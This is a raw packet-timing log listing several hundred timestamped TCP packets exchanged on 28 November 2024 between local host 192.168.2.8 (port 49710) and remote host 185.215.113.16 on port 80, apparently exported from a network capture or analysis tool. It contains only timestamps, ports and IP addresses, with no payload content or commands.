                                                  Nov 28, 2024 13:11:01.216439962 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.216497898 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.216572046 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.216676950 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.217572927 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.217649937 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.217681885 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.217730045 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.218713999 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.218813896 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.335359097 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.335433006 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.335536957 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.335582018 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.335876942 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.335952997 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.335971117 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.336024046 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.336756945 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.336815119 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.336874962 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.336915016 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.337907076 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.337956905 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.338026047 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.338063955 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.339201927 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.339298964 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.339319944 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.339360952 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.340213060 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.340271950 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.340293884 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.340362072 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.341317892 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.341378927 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.341406107 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.341473103 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.359098911 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.359155893 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.359236002 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.359280109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.359641075 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.359724045 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.359781981 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.359827995 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.360801935 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.360840082 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.360888958 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.360930920 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.361901999 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.361941099 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.362042904 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.362082005 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.363122940 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.363157988 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.363229036 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.363332033 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.364193916 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.364331007 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.364334106 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.364382029 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.365329981 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.365401983 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.365468025 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.365550041 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.366492033 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.366592884 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.366596937 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.366740942 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.367630959 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.367722034 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.367796898 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.367858887 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.368768930 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.368860006 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.368860960 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.368911982 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.369904041 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.369956017 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.369997978 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.370049953 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.371115923 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.371196032 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.371237993 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.371299982 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.372169018 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.372226000 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.372282028 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.372358084 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.373332977 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.373406887 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.373588085 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.373648882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.374459982 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.374540091 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.374620914 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.374706030 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.375565052 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.375677109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.375684023 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.375739098 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.376739979 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.376782894 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.376821041 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.376878977 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.377861023 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.377943993 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.378000021 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.378041983 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.379057884 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.379134893 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.379178047 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.379216909 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.380141973 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.380198002 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.380273104 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.380316019 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.381339073 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.381382942 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.381464958 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.381548882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.382437944 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.382493973 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.382548094 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.382613897 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.383558989 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.383596897 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.383665085 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.383701086 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.384721994 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.384797096 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.384835958 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.384891033 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.385835886 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.385895014 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.385925055 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.385963917 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.386965036 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.387008905 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.387082100 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.387152910 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.388113976 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.388181925 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.388226032 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.388350010 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.389241934 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.389296055 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.389318943 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.389365911 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.390382051 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.390480042 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.390486956 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.390538931 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.391518116 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.391561031 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.391616106 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.391729116 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.392646074 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.392715931 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.392723083 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.392785072 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.393794060 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.393857002 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.393902063 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.393902063 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.394927979 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.394982100 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.395035982 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.395102978 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.396109104 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.396162987 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.396198034 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.396249056 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.397193909 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.397258043 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.397305965 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.397367954 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.398360968 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.398425102 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.398483992 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.398530960 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.399513006 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.399624109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.399689913 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.399733067 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.400625944 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.400676966 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.400727034 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.400768995 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.401808023 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.401853085 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.401885033 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.401927948 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.402951956 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.402995110 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.403078079 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.403203011 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.404092073 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.404153109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.404239893 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.404359102 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.405196905 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.405276060 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.405301094 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.405392885 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.406296015 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.406394958 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.406425953 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.406476021 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.407423019 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.407500982 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.407526970 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.407572985 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.408579111 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.408628941 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.408698082 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.408782005 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.409707069 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.409754038 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.409845114 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.409883022 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.410831928 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.410908937 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.527605057 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.527751923 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.527767897 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.527837992 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.528223038 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.528311014 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.528316021 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.528378010 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.529303074 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.529390097 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.529416084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.529457092 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.530450106 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.530504942 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.530577898 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.530631065 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.531598091 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.531673908 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.531708956 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.531750917 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.532736063 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.532789946 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.532866955 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.532958984 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.533962965 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.534034014 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.534039974 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.534102917 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.551290035 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.551340103 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.551419973 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.551445007 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.551860094 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.551970005 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.551989079 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.552083015 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.552970886 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.553037882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.553075075 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.553148985 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.554111004 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.554162979 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.554194927 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.554256916 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.555237055 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.555309057 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.555346012 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.555510044 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.556392908 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.556453943 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.556677103 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.556826115 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.557506084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.557626963 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.557637930 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.557677031 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.558634996 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.558684111 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.558828115 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.558871031 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.559772968 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.559858084 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.559887886 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.559937000 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.560945988 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.561018944 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.561069965 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.561119080 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.562068939 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.562169075 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.562186956 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.562232018 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.563235044 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.563278913 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.563411951 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.563482046 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.564337969 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.564414024 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.564441919 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.564518929 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.565459013 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.565578938 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.565614939 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.565614939 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.566611052 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.566658020 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.566715002 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.566802025 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.567766905 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.567842960 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.567879915 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.567923069 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.568895102 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.568983078 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.569015026 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.569052935 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.570074081 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.570136070 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.570223093 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.570270061 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.571193933 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.571263075 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.571289062 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.571340084 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.572310925 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.572372913 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.572407007 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.572515011 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.573431015 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.573487043 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.573517084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.573590994 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.574584961 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.574659109 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:01.574671984 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:01.574711084 CET4971080192.168.2.8185.215.113.16
